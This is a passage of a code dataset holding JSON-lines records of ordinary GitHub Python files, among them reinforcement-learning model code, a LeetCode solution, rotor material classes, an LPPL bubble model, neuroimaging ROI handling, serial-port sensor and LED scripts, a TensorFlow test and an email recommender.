padding_mode=\"replicate\",\n                ),\n                activation(inplace=True),\n                nn.Conv2d(\n                    filters * 2,\n                    filters * 2,\n                    kernel_size=3,\n                    stride=1,\n                    padding=1,\n                    padding_mode=\"replicate\",\n                ),\n                activation(inplace=True),\n            ]\n        )\n\n        # --- out shape\n        x = np.ones((1,) + in_shape, dtype=np.float32)\n        y = self.forward(torch.tensor(x))\n        self.out_shape = y.shape[-3:]\n\n    def forward(self, x):\n        if self.enable_time_distributed_layer:\n            # (batch, seq, c, h, w) -> (batch*seq, c, h, w)\n            batch_size, seq, channels, height, width = x.size()\n            x = x.view(batch_size * seq, channels, height, width)\n\n            for layer in self.image_layers:\n                x = layer(x)\n\n            # (batch*seq, c, h, w) -> (batch, seq, c, h, w)\n            _, channels, height, width = x.size()\n            x = x.view(batch_size, seq, channels, height, width)\n\n        
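# no time axis: apply the conv stack directly\n        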
else:\n            for layer in self.image_layers:\n                x = layer(x)\n\n        return x\n\n\nif __name__ == \"__main__\":\n    m = DQNImageBlock((3, 96, 72))\n    print(m)\n","repo_name":"pocokhc/simple_distributed_rl","sub_path":"srl/rl/models/dqn/torch_/dqn_image_block.py","file_name":"dqn_image_block.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"72862241014","text":"# You are given an m x n matrix of characters box representing a side-view of a box. Each cell of the box is one of the following:\n\n# A stone '#'\n# A stationary obstacle '*'\n# Empty '.'\n\n# The box is rotated 90 degrees clockwise, causing some of the stones to fall due to gravity. Each stone falls down until it lands on an obstacle, another stone, or the bottom of the box. Gravity does not affect the obstacles' positions, and the inertia from the box's rotation does not affect the stones' horizontal positions.\n\n# It is guaranteed that each stone in box rests on an obstacle, another stone, or the bottom of the box.\n\n# Return an n x m matrix representing the box after the rotation described above.\n\nclass Solution:\n    def rotateTheBox(self, box: List[List[str]]) -> List[List[str]]:\n        for row in box:\n            for i in range(len(row)-1,-1,-1):\n                if row[i] == '#':\n                    self.move(row,i)\n        newBox = []\n        for m in range(len(box[0])):\n            level = []\n            for n in range(len(box)-1,-1,-1):\n                level.append(box[n][m])\n            newBox.append(level)\n        return newBox\n    \n    \n    def move(self,row,idx):\n        if idx < len(row) - 1:\n            while idx < len(row) -1 and row[idx+1] == '.':\n                row[idx] = '.'\n                row[idx + 1] = '#'\n                idx +=1 \n\n# Time complexity is O(M * N^2): each of the M rows has N cells and a stone may slide across up to N cells\n\n# Space complexity is O(MN) if we consider the newBox grid\n\n# Same problem, more succinct code: one pass per row drops each stone into the lowest free slot, then zip rotates the grid clockwise in O(M * N)\n\nclass Solution:\n    def rotateTheBox(self, box: List[List[str]]) -> List[List[str]]:\n        for row in box:\n            write = len(row) - 1\n            for read in range(len(row)-1,-1,-1):\n                if row[read] == '*':\n                    write = read - 1\n                elif row[read] == '#':\n                    row[read] = '.'\n                    row[write] = '#'\n                    write -= 1\n        return [list(row) for row in zip(*box[::-1])]\n\n    ","repo_name":"conor47/Algorithm-Patterns","sub_path":"General Problems/Array/rotatingTheBox.py","file_name":"rotatingTheBox.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13550797384","text":"\"\"\"Materials module.\n\nThis module defines the Material class and defines\nsome of the most common materials used in rotors.\n\"\"\"\nfrom collections.abc import Iterable\n\nimport numpy as np\n\nfrom ross.materials import Material\nfrom ross.stochastic.st_results_elements import plot_histogram\nfrom ross.units import check_units\n\n__all__ = [\"ST_Material\"]\n\n\nclass ST_Material:\n    \"\"\"Create instance of Material with random parameters.\n\n    Class used to create a material and define its properties.\n    Density and at least 2 arguments from E, G_s and Poisson should be\n    provided.\n\n    If any material property is passed as iterable, the material becomes random.\n    Inputting 1 or 2 arguments from E, G_s or Poisson as iterable will turn the\n    third argument into an iterable, calculated based on the other two.\n\n    For example:\n        if E is iterable and G_s is float, then, Poisson is iterable and each\n        term is calculated based on E values and G_s single value.\n\n    You can run ross.Material.available_materials() to get a list of materials\n    already provided.\n\n    Parameters\n    ----------\n    name : str\n        Material name.\n    rho : float, list, pint.Quantity\n        
Density (kg/m**3).\n        Input a list to make it random.\n    E : float, list, pint.Quantity\n        Young's modulus (N/m**2).\n        Input a list to make it random.\n    G_s : float, list\n        Shear modulus (N/m**2).\n        Input a list to make it random.\n    Poisson : float, list\n        Poisson ratio (dimensionless).\n        Input a list to make it random.\n    color : str\n        Can be used on plots.\n\n    Examples\n    --------\n    >>> # Steel with random Young's modulus.\n    >>> import ross.stochastic as srs\n    >>> E = np.random.uniform(208e9, 211e9, 5)\n    >>> st_steel = srs.ST_Material(name=\"Steel\", rho=7810, E=E, G_s=81.2e9)\n    >>> len(list(iter(st_steel)))\n    5\n    \"\"\"\n\n    @check_units\n    def __init__(\n        self, name, rho, E=None, G_s=None, Poisson=None, color=\"#525252\", **kwargs\n    ):\n        self.name = str(name)\n        if \" \" in name:\n            raise ValueError(\"Spaces are not allowed in Material name\")\n\n        i = 0\n        for arg in [\"E\", \"G_s\", \"Poisson\"]:\n            if locals()[arg] is not None:\n                i += 1\n        if i != 2:\n            raise ValueError(\n                \"Exactly 2 arguments from E, G_s and Poisson should be provided\"\n            )\n\n        is_random = []\n        for par, _name in zip([rho, E, G_s, Poisson], [\"rho\", \"E\", \"G_s\", \"Poisson\"]):\n            if isinstance(par, Iterable):\n                is_random.append(_name)\n\n        if type(rho) == list:\n            rho = np.asarray(rho)\n        if type(E) == list:\n            E = np.asarray(E)\n        if type(G_s) == list:\n            G_s = np.asarray(G_s)\n        if type(Poisson) == list:\n            Poisson = np.asarray(Poisson)\n\n        attribute_dict = dict(\n            name=name,\n            rho=rho,\n            E=E,\n            G_s=G_s,\n            Poisson=Poisson,\n            color=color,\n        )\n        self.is_random = is_random\n        self.attribute_dict = attribute_dict\n\n    def __iter__(self):\n        \"\"\"Return an iterator for the container.\n\n        Returns\n        -------\n        An iterator over random material properties.\n\n        Examples\n        --------\n        >>> import ross.stochastic as srs\n        >>> E = np.random.uniform(208e9, 211e9, 5)\n        >>> st_steel = srs.ST_Material(name=\"Steel\", rho=7810, E=E, G_s=81.2e9)\n        >>> len(list(iter(st_steel)))\n        5\n        \"\"\"\n        return iter(self.random_var(self.is_random, self.attribute_dict))\n\n    def __getitem__(self, key):\n        \"\"\"Return the value for a given key from attribute_dict.\n\n        Parameters\n        ----------\n        key : str\n            A class parameter as string.\n\n        Raises\n        ------\n        KeyError\n            Raises an error if the parameter doesn't belong to the class.\n\n        Returns\n        -------\n        Return the value for the given key.\n\n        Example\n        -------\n        >>> import ross.stochastic as srs\n        >>> E = np.random.uniform(208e9, 211e9, 5)\n        >>> st_steel = srs.ST_Material(name=\"Steel\", rho=7810, E=E, G_s=81.2e9)\n        >>> st_steel[\"rho\"]\n        7810\n        \"\"\"\n        if key not in self.attribute_dict.keys():\n            raise KeyError(\"Object does not have parameter: {}.\".format(key))\n\n        return self.attribute_dict[key]\n\n    def __setitem__(self, key, value):\n        \"\"\"Set new parameter values for the object.\n\n        Function to change a parameter value.\n        It's not allowed to add new parameters to the object.\n\n        Parameters\n        ----------\n        key : str\n            A class parameter as string.\n        value : The corresponding value for the attribute_dict's key.\n            ***check the correct type for each key in ST_Material\n            docstring.\n\n        Raises\n        ------\n        KeyError\n            Raises an error if the parameter doesn't belong to the class.\n\n        Example\n        -------\n        >>> import ross.stochastic as srs\n        >>> E = np.random.uniform(208e9, 211e9, 5)\n        >>> st_steel = srs.ST_Material(name=\"Steel\", rho=7810, E=E, G_s=81.2e9)\n        >>> st_steel[\"E\"] = np.linspace(200e9, 205e9, 5)\n        >>> st_steel[\"E\"]\n        array([2.0000e+11, 2.0125e+11, 2.0250e+11, 2.0375e+11, 2.0500e+11])\n        \"\"\"\n        if key not in 
self.attribute_dict.keys():\n            raise KeyError(\"Object does not have parameter: {}.\".format(key))\n        self.attribute_dict[key] = value\n\n    def random_var(self, is_random, *args):\n        \"\"\"Generate a list of objects as random attributes.\n\n        This function creates a list of objects with random values for selected\n        attributes from ross.Material.\n\n        Parameters\n        ----------\n        is_random : list\n            List of the object attributes to become stochastic.\n        *args : dict\n            Dictionary instantiating the ross.Material class.\n            The attributes that are supposed to be stochastic should be\n            set as lists of random variables.\n\n        Returns\n        -------\n        f_list : generator\n            Generator of random objects.\n        \"\"\"\n        args_dict = args[0]\n        new_args = []\n        for i in range(len(args_dict[is_random[0]])):\n            arg = []\n            for key, value in args_dict.items():\n                if key in is_random:\n                    arg.append(value[i])\n                else:\n                    arg.append(value)\n            new_args.append(arg)\n        f_list = (Material(*arg) for arg in new_args)\n\n        return f_list\n\n    def plot_random_var(self, var_list=None, histogram_kwargs=None, plot_kwargs=None):\n        \"\"\"Plot histogram and the PDF.\n\n        This function creates a histogram to display the random variable\n        distribution.\n\n        Parameters\n        ----------\n        var_list : list, optional\n            List of random variables, in string format, to plot.\n            Default is plotting all the random variables.\n        histogram_kwargs : dict, optional\n            Additional keyword arguments can be passed to change\n            the plotly.go.histogram (e.g. histnorm=\"probability density\", nbinsx=20...).\n            *See Plotly API for more information.\n        plot_kwargs : dict, optional\n            Additional keyword arguments can be passed to change the plotly go.figure\n            (e.g. line=dict(width=4.0, color=\"royalblue\"), opacity=1.0, ...).\n            *See Plotly API for more information.\n\n        Returns\n        -------\n        fig : Plotly graph_objects.Figure()\n            A figure with the histogram plots.\n\n        Examples\n        --------\n        >>> import ross.stochastic as srs\n        >>> E = np.random.uniform(208e9, 211e9, 5)\n        >>> st_steel = srs.ST_Material(name=\"Steel\", rho=7810, E=E, G_s=81.2e9)\n        >>> fig = st_steel.plot_random_var([\"E\"])\n        >>> # fig.show()\n        \"\"\"\n        label = dict(\n            E=\"Young's Modulus\",\n            G_s=\"Shear Modulus\",\n            Poisson=\"Poisson coefficient\",\n            rho=\"Density\",\n        )\n\n        if var_list is None:\n            var_list = self.is_random\n        elif not all(var in self.is_random for var in var_list):\n            raise ValueError(\n                \"Random variable not in var_list. Select variables from {}\".format(\n                    self.is_random\n                )\n            )\n\n        return plot_histogram(\n            self.attribute_dict, label, var_list, histogram_kwargs=histogram_kwargs or {}, plot_kwargs=plot_kwargs or {}\n        )\n","repo_name":"petrobras/ross","sub_path":"ross/stochastic/st_materials.py","file_name":"st_materials.py","file_ext":"py","file_size_in_byte":8599,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"21"} +{"seq_id":"9564669309","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 19 17:29:55 2013\n\n@author: hok1\n\"\"\"\n\nimport numpy as np\nfrom functools import partial\n\n# Parameters from E. Jacobsson, fig. 
1\ndef lppl(t, A=569.988, B=-266.943, C=-14.242, tc=1930.218, phi=-4.1, \n         omega=7.877, z=0.445):\n    critical_dist = (tc-t)**z\n    first = A\n    second = B*critical_dist\n    third = C*critical_dist*np.cos(omega*np.log(tc-t)+phi)\n    return first+second+third\n    \ndef costfunction(tarray, yarray, model):\n    modelyarray = model(tarray)\n    return np.sum((modelyarray-yarray)**2)/len(tarray) if len(tarray)>0 else 0\n    \ndef lppl_costfunction(tarray, yarray, A=569.988, B=-266.943, C=-14.242,\n                      tc=1930.218, phi=-4.1, omega=7.877, z=0.445):\n    '''\n    tyarray = filter(lambda item: item[0]<tc, zip(tarray, yarray))\n    filter_tarray = np.array(map(lambda item: item[0], tyarray))\n    filter_yarray = np.array(map(lambda item: item[1], tyarray))\n    peak_y = np.max(filter_yarray) if len(filter_yarray)>0 else 0\n    crashedtyarray = filter(lambda item: item[0]>=tc, zip(tarray, yarray))\n    crashed_cost = 0\n    if (len(crashedtyarray) > 0):\n        crashed_cost = np.sum(np.array(map(lambda item: (item[1]-peak_y)**2, crashedtyarray))) / len(crashedtyarray)\n    return costfunction(filter_tarray, filter_yarray, model) + crashed_cost\n    '''\n    model = partial(lppl, A=A, B=B, C=C, tc=tc, phi=phi, omega=omega, z=z)\n    maxt = np.max(tarray)\n    return float('inf') if tc < maxt else costfunction(tarray, yarray, model)\n    \n    \ndef lppl_dictparam(tarray, parameters):\n    return lppl(tarray, A=parameters['A'], B=parameters['B'],\n                C=parameters['C'], tc=parameters['tc'], \n                phi=parameters['phi'], omega=parameters['omega'],\n                z=parameters['z'])    \n    \ndef lpplcostfunc_dictparam(tarray, yarray, parameters):\n    return lppl_costfunction(tarray, yarray, A=parameters['A'], \n                             B=parameters['B'], C=parameters['C'], \n                             tc=parameters['tc'], phi=parameters['phi'],\n                             omega=parameters['omega'], z=parameters['z'])\n","repo_name":"OwaJawa/lppl","sub_path":"lpplmodel.py","file_name":"lpplmodel.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"41413755606","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 19 17:24:47 2019\n\n@author: 106300\n\"\"\"\n\nimport plotly.graph_objects as go\n\nfig = go.Figure()\n\nfig.add_trace(go.Scatter(\n    x=[1.5, 4.5],\n    y=[0.75, 0.75],\n    text=[\"Unfilled Rectangle\", \"Filled Rectangle\"],\n    mode=\"text\",\n))\n\n# Set axes properties\nfig.update_xaxes(range=[0, 7], showgrid=False)\nfig.update_yaxes(range=[0, 5])\n\n# Add shapes\nfig.add_shape(\n    # unfilled Rectangle\n    go.layout.Shape(\n        type=\"rect\",\n        xref=\"x\",\n        yref=\"y\",\n        x0=1,\n        y0=1,\n        x1=2,\n        y1=2,\n        line=dict(\n            color=\"RoyalBlue\",\n        ),\n    ))\nfig.add_shape(\n    # filled Rectangle\n    go.layout.Shape(\n        type=\"rect\",\n        x0=3,\n        y0=1,\n        x1=6,\n        y1=2,\n        line=dict(\n            color=\"RoyalBlue\",\n            width=2,\n        ),\n        fillcolor=\"LightSkyBlue\",\n    ))\nfig.update_shapes(dict(xref='x', yref='y'))\nfig.show()","repo_name":"orlando68/Stanford","sub_path":"plotly_rectangle.py","file_name":"plotly_rectangle.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19992435390","text":"\n\nimport nibabel as nib\nimport nilearn as nil\nfrom nilearn import plotting\n\nfrom socket import gethostname\nfrom yaml.loader import SafeLoader\nimport yaml\n\nprint(gethostname())\n# Open the file and load the file\nwith open('config.yml') as f:\n    all_yaml = yaml.load(f, Loader=SafeLoader)\n    if gethostname() in all_yaml.keys():\n        config = all_yaml[gethostname()]\n    else:\n        config = all_yaml['default']\n    \nprint(config)\n    \n#dev_scripts_abs_path = config['l2_analysis_files']\nl2_analysis_files = config['l2_analysis_files']\n#posterror_folder = 'posterror_cues_no_rt_20230616'\nposterror_folder = 
'posterror_cues_no_rt_20230821'\n\ncluster_folderpath = l2_analysis_files + '/SST/' + posterror_folder + '/CueFollowing(CS>FS)'\n# roi file to open\nroi_files = [cluster_folderpath + '/CueFollowing(CS>FS)striatal_cluster_1.nii',\ncluster_folderpath + '/CueFollowing(CS>FS)striatal_cluster_2.nii']\n# load each of the roi files\n \nroi_data = []\nfor roi_file in roi_files:\n    print(roi_file)\n    ni_file = nib.load(roi_file)\n    #binarize roi using nilearn\n    ni_file = nil.image.math_img(\"img > 0\", img=ni_file)\n    roi_data = roi_data + [ni_file]\n    #display the roi\n    #plotting.plot_roi(ni_file, title=roi_file)\n    print(\"displayed\")\n#combine the rois\n#concatenate them\ncombined_roi_data = nil.image.concat_imgs(roi_data)\n#then add them\ncombined_roi_data = nil.image.math_img(\"np.sum(imgs, axis=3)\", imgs=combined_roi_data)\n\nplotting.plot_roi(combined_roi_data, title=\"combined\")\n#save the combined roi\ncombined_roi_data.to_filename(\n    cluster_folderpath + '/CueFollowing(CS>FS)striatal_cluster_combined.nii')\n\n \n\n\n","repo_name":"UOSAN/DEV_scripts","sub_path":"fMRI/fx/models/SST/direct_regression/create_striatal_roi.py","file_name":"create_striatal_roi.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25730393685","text":"#!/usr/bin/env python3\n\n# from magPlot import MagPlot\nfrom serial import Serial\nimport numpy as np\nfrom the_collector import Collector\nfrom datetime import datetime\nimport time\nfrom datatypes import *\n# from threading import Thread, Event, Lock\n# import copy\nimport sys\n\n\ninfo = {\n    \"lis3mdl\": {\n        \"mag_range_gs\": 4,\n        \"samplerate_hz\": 155,\n        \"date\": datetime.now().isoformat()\n    }\n}\n\ndata = {\n    \"accels\": [],\n    \"gyros\": [],\n    \"mags\": [],\n    \"pt\": [],\n    \"timestamp\": []\n}\n\ndef main():\n    global plot_buffer\n    coll = Collector()\n    coll.timestamp = False\n\n    ser = Serial()\n    ser.port = \"/dev/tty.usbmodem14401\"\n    ser.baudrate = 1000000\n    ser.open()\n\n    try:\n        while (True):\n            buffer = []\n            c = ser.read().decode(\"utf8\")\n            while (c != '\\n'):\n                buffer.append(c)\n                c = ser.read().decode(\"utf8\")\n\n            if buffer[0] == '*':\n                continue\n\n            s = ''.join(buffer)\n            print(s)\n\n            v = s.split('|') # breakout sensors\n\n            vv = v[1].split(',')\n            a = vec_t(float(vv[0]),float(vv[1]),float(vv[2]))\n            data[\"accels\"].append(a)\n\n            vv = v[2].split(',')\n            g = vec_t(float(vv[0]),float(vv[1]),float(vv[2]))\n            data[\"gyros\"].append(g)\n\n            ts = float(v[3])\n            data[\"timestamp\"].append(ts)\n\n            vv = v[4].split(',')\n            m = vec_t(float(vv[0]),float(vv[1]),float(vv[2]))\n            data[\"mags\"].append(m)\n\n            vv = v[5].split(',')\n            pt = pt_t(float(vv[0]),float(vv[1]))\n            data[\"pt\"].append(pt)\n\n    except KeyboardInterrupt:\n        print(\"Data points captured: \", len(data[\"accels\"]))\n        coll.write(\"allcal.pkl\", data, info)\n        sys.stdout.flush()\n    finally:\n        ser.close()\n\nmain()\n","repo_name":"the-guild-of-calamitous-intent/gciSensors","sub_path":"docs/notebooks/calibration/get_all_data.py","file_name":"get_all_data.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13848408317","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@project: apiAutoTest\n@author: zy7y\n@file: read_config.py\n@ide: PyCharm\n@time: 2020/7/31\n\"\"\"\nimport yaml\nfrom loguru import logger\n\n\nclass ReadConfig(object): # the class that reads the config data\n    data = None\n    # define the data attribute\n\n    # log any errors to the console or to the log file\n    
@logger.catch\n    def __init__(self):\n        # specify the encoding explicitly to avoid errors when running the code on Windows\n        with open('../config/config.yaml', 'r', encoding='utf-8') as file:\n            self.data = yaml.load(file.read(), Loader=yaml.FullLoader) # yaml.load converts the YAML content into Python data types\n            # yaml.load parses the first YAML document in the stream and builds a Python object.\n\n    @logger.catch\n    def read_serve_config(self, sever_name):\n        # read the server address\n\n        logger.info(self.data.get('server').get(sever_name))\n        # get the 'server' section of the yaml file (it holds test and dev), then get the named entry\n        return self.data.get('server').get(sever_name)\n\n    @logger.catch\n    def read_response_reg(self):\n        # this is the jsonpath expression used to extract the token - an expression, not data!\n        get_token = self.data.get(\"response_reg\").get(\"token\")\n        get_resp = self.data.get('response_reg').get('response')\n        logger.info(f'token extraction expression for the response: {get_token}') # an alternative output style, nicer formatting, shown at the bottom\n        logger.info(f'expression for the response fields to validate: {get_resp}')\n        return get_token, get_resp\n\n    @logger.catch\n    # fetch a file path from the config by name\n    def read_file_path(self, file_path_name):\n        return self.data.get('file_path').get(file_path_name)\n\n    def read_email_setting(self):\n        return self.data.get('email')\n\nif __name__ == '__main__': # quick check that the class works\n    read_config = ReadConfig() # instantiate\n    result = read_config.data\n    print(type(result),result) #\n\n    result = read_config.read_serve_config('dev')\n    print(result,type(result)) # the fixed base part of the API address\n\n    response_reg,token_reg = read_config.read_response_reg()\n    print(response_reg,token_reg)\n\n    result = read_config.read_file_path('case_data')\n    print(result)\n\n    result = read_config.read_file_path('test') # read a file path that does not exist\n    print(result,type(result)) # None \n\n    result = read_config.read_email_setting()\n    print(result,type(result))\n\n\n\n","repo_name":"Mor03/git01","sub_path":"tools/read_config.py","file_name":"read_config.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39913262847","text":"import pandas as pd\n\nfrom src.centroid_recommendation import compute_recommendations\nfrom src.postprocess import write_results_ranked\nfrom src.preprocess import body_dict_from_panda, get_email_ids_per_sender, get_conversation_ids, get_all_senders\nfrom src.scoring import get_train_val, compute_prediction_mad\nfrom src.tfidftools import get_tfidf\nimport pickle as pkl\n\npath_to_data = 'data/'\npath_to_results = 'results/'\n\nn_recipients = 'max'\n\n##########################\n# load some of the files #\n##########################\n\ntraining = pd.read_csv(path_to_data + 'training_set.csv', sep=',', header=0)\n\ntraining_info = pd.read_csv(\n    path_to_data + 'training_info.csv', sep=',', header=0)\n\ntest = pd.read_csv(path_to_data + 'test_set.csv', sep=',', header=0)\n\ntest_info = pd.read_csv(\n    path_to_data + 'test_info.csv', sep=',', header=0)\n\n# Compute useful structures\n\ntrain_info, train_ids_per_sender_val, val_info, val_ids_per_sender = get_train_val(training, training_info,\n                                                                                   0.95, disp=True)\n\ntrain_bodies = body_dict_from_panda(train_info)\nval_bodies = body_dict_from_panda(val_info)\n\ntest_bodies = body_dict_from_panda(test_info)\n\nbody_dict = {**train_bodies, **val_bodies, **test_bodies}\n\nprint('Fitting tfidf, this will take some time...')\ntfidf, tfs, keys = get_tfidf(body_dict, 0.001, 0.10)\nprint(\"Fitted.\")\n\nprint(\"Computing recommendations for train/val...\")\n\nconversation_ids_val = get_conversation_ids(train_ids_per_sender_val, training_info)\nsenders = get_all_senders(training)\nrecommendations_val = compute_recommendations(n_recipients, senders, train_info, conversation_ids_val, val_info,\n                                              val_ids_per_sender, 
tfidf)\nprint(\"Done!\")\n\nprint(\"Computing recommendations for train/test...\")\n\nn_recipients = 10\n\ntrain_ids_per_sender = get_email_ids_per_sender(training)\nconversation_ids = get_conversation_ids(train_ids_per_sender, training_info)\ntest_ids_per_sender = get_email_ids_per_sender(test)\n\nrecommendations_test = compute_recommendations(n_recipients, senders, training_info, conversation_ids, test_info,\n test_ids_per_sender, tfidf)\nprint(\"Done!\")\nprint(\"Computing score on validation set...\")\nprint(\"Score: {}\".format(compute_prediction_mad(recommendations_val, val_info)))\n\nprint(\"Writing file...\")\nwrite_results_ranked(recommendations_val, path_to_results, \"centroids_validation.csv\")\nwrite_results_ranked(recommendations_test, path_to_results, \"centroids_test.csv\")\n\nwith open(path_to_results + 'centroids_dict.p', 'wb') as f:\n pkl.dump(recommendations_val, f)","repo_name":"GeoffNN/ALTEGRADEnron","sub_path":"centroids_demo.py","file_name":"centroids_demo.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15936908001","text":"\nimport os\nfrom tensorflow.python.client import session\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import importer\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import test_util\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import variables\nfrom tensorflow.python.platform import test\nfrom tensorflow.python.training import quantize_training\nfrom tensorflow.python.training import saver as saver_module\nclass PywrapQuantizeTrainingTest(test.TestCase):\n def testQuantizeTraining(self):\n with session.Session() as sess:\n a = constant_op.constant(6.0, shape=[1, 1])\n b = constant_op.constant(7.0, shape=[1, 1])\n c = math_ops.matmul(a, b, name='matmul')\n self.assertEqual(c.eval(), 42.0)\n self.assertEqual(len(sess.graph_def.node), 3)\n result = quantize_training.do_quantize_training_on_graphdef(\n sess.graph_def, 8)\n self.assertGreater(len(result.node), 3)\n @test_util.run_v1_only('The API is only expect to work with v1 session mode.')\n def testQuantizedSaveRestore(self):\n save_path = os.path.join(self.get_temp_dir(), 'quantized_save_restore')\n g = ops.Graph()\n with session.Session(graph=g) as sess:\n a = constant_op.constant(6.0, shape=[1, 1], name='a')\n b = variables.VariableV1(\n constant_op.constant(7.0, shape=[1, 1]), name='b')\n c = math_ops.matmul(a, b, name='matmul')\n init_op = variables.global_variables_initializer()\n saver = saver_module.Saver({'b': b})\n result = quantize_training.do_quantize_training_on_graphdef(\n sess.graph_def, 8)\n with ops.Graph().as_default() as g, session.Session(graph=g) as sess:\n _ = importer.import_graph_def(result, name='')\n self.evaluate(g.get_operation_by_name(init_op.name))\n self.evaluate(g.get_tensor_by_name(c.name))\n saver.save(sess, save_path)\n with ops.Graph().as_default() as g, session.Session(graph=g) as sess:\n _ = importer.import_graph_def(result, name='')\n saver.restore(sess, save_path)\n self.assertEqual(7.0, sess.run(g.get_tensor_by_name('b:0')))\n self.assertEqual(6.0, sess.run(g.get_tensor_by_name('a/Min/Variable:0')))\n self.assertEqual(6.0, sess.run(g.get_tensor_by_name('a/Max/Variable:0')))\n self.assertEqual(7.0,\n sess.run(g.get_tensor_by_name('b/read/Min/Variable:0')))\n self.assertEqual(7.0,\n sess.run(g.get_tensor_by_name('b/read/Max/Variable:0')))\nif __name__ == 
'__main__':\n  test.main()\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_2/quantize_training_test.py.transformed.py","file_name":"quantize_training_test.py.transformed.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35755353880","text":"'''import serial\r\nfrom serial import Serial\r\nimport time\r\n\r\ndef light_on_off(i):\r\n    serialcomm = serial.Serial('COM8', 9600)\r\n    print('############')\r\n    print(i)\r\n    print('############')\r\n    serialcomm.timeout = 1\r\n\r\n    serialcomm.write(i.encode())\r\n\r\n    time.sleep(10)\r\n\r\n    print('################')\r\n    print(serialcomm.readline().decode('ascii'))\r\n    print('############')\r\n    serialcomm.close()\r\n    print('############')\r\n    print(i)\r\n    print(b'L')\r\n    print(i)\r\n    #print('############')\r\n    ser = serial.Serial('COM8',9600,timeout = 1)\r\n    val = i.encode()\r\n    #ser.write(val)\r\nser = serial.Serial('COM8', 9600, timeout=1)\r\n\r\ntry:\r\n    ser.write(b'H')\r\n    print(ser.write(b'H'))\r\nexcept:\r\n    print('error')'''\r\n\r\n\r\n\r\nimport serial\r\nfrom serial import Serial\r\nimport time\r\n\r\nser = serial.Serial('COM8', 9600)\r\n\r\nser.write(b'H')\r\n# LED turns on\r\n\r\nser.write(b'L')\r\n# LED turns off\r\n\r\nser.write(b'H')\r\n# LED turns on\r\n\r\nser.write(b'L')\r\n# LED turns off\r\n\r\nser.close()\r\nexit()","repo_name":"prathikbafna/capstone-project-Eye-gazing","sub_path":"home_automation/home_automation_control.py","file_name":"home_automation_control.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26797314938","text":"import datetime\nimport random\nimport json\nimport os\n\ndirec = \"/home/bresilla/.darwin/datasets/wur-agrofoodrobotics/cow_pose/releases/newr/annotations/\"\nimpath = \"/home/bresilla/.darwin/datasets/wur-agrofoodrobotics/cow_pose/images/\"\njson_file = \"/home/bresilla/.darwin/datasets/wur-agrofoodrobotics/cow_pose/releases/newr/\"\n\ndirectory_list = os.listdir(direc)\nrandom.shuffle(directory_list)\n\nsplit=int((len(directory_list)/10)*8)\ndata_list = [{\"images\": directory_list[:split], \"name\": \"train.json\"}, {\"images\": directory_list[split:], \"name\": \"val.json\"}]\n\nfor coll in data_list:\n    images = []\n    annotations = []\n    i = random.randint(11111, 99999)\n    for file in coll[\"images\"]:\n        i = i + 1\n        with open(direc + file, 'r') as fcc_file:\n            fcc_data = json.load(fcc_file)\n            image_struct = {\n                \"id\": i,\n                \"file_name\": fcc_data[\"image\"][\"original_filename\"],\n                \"width\": int(fcc_data['image']['width']),\n                \"height\": int(fcc_data['image']['height']),\n                \"full_name\": impath + fcc_data[\"image\"][\"original_filename\"],\n            }\n            images.append(image_struct)\n            for e in fcc_data['annotations']:\n                img_width=int(fcc_data['image']['width'])\n                img_height=int(fcc_data['image']['height'])\n                parts = {}\n                x_min = img_width\n                x_max = 0\n                y_min = img_height\n                y_max = 0\n                for p in e[\"skeleton\"][\"nodes\"]:\n                    parts[p[\"name\"]]=[int(p[\"x\"]),int(p[\"y\"]),int(p[\"occluded\"])+1]\n                    if int(p[\"x\"]) < x_min:\n                        x_min = int(p[\"x\"])\n                        if x_min < 0: \n                            x_min = 0\n                            parts[p[\"name\"]]=[int(p[\"x\"]),int(p[\"y\"]),0]\n                    if int(p[\"x\"]) > x_max:\n                        x_max = int(p[\"x\"])\n                        if x_max > img_width: \n                            x_max = img_width\n                            parts[p[\"name\"]]=[int(p[\"x\"]),int(p[\"y\"]),0]\n                    if int(p[\"y\"]) < y_min:\n                        y_min = int(p[\"y\"])\n                        if y_min < 0: \n                            y_min = 0\n                            
